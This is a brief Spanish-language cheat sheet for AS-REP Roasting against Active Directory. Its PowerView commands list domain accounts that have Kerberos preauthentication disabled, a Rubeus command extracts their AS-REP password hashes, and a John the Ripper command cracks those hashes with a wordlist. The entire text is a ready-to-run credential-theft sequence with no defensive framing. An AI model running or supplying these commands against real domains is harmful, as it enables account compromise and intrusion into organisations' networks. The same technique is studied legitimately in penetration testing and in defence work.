AS-REP Roasting

# Identificar cuenta vulnerable con la opción "Do not require preauthentication" habilitada.
Get-DomainUser -PreauthNotRequired
Get-DomainUser -UACFilter DONT_REQ_PREAUTH
Get-Domainuser | Where-Object { $_.UserAccountControl -like "*DONT_REQ_PREAUTH*"} | select samaccountname, UserAccountControl

# Aprovechar el AS-REP Roasting para extraer hashes de contraseñas.
.\Rubeus.exe asreproast /usr:${samaccountname} /outfile:samaccountname.txt

# Descifrar hashes 
.\john.exe .\johnnyhash.txt --format=krb5asrep --wordlist=10k-wordlist.txt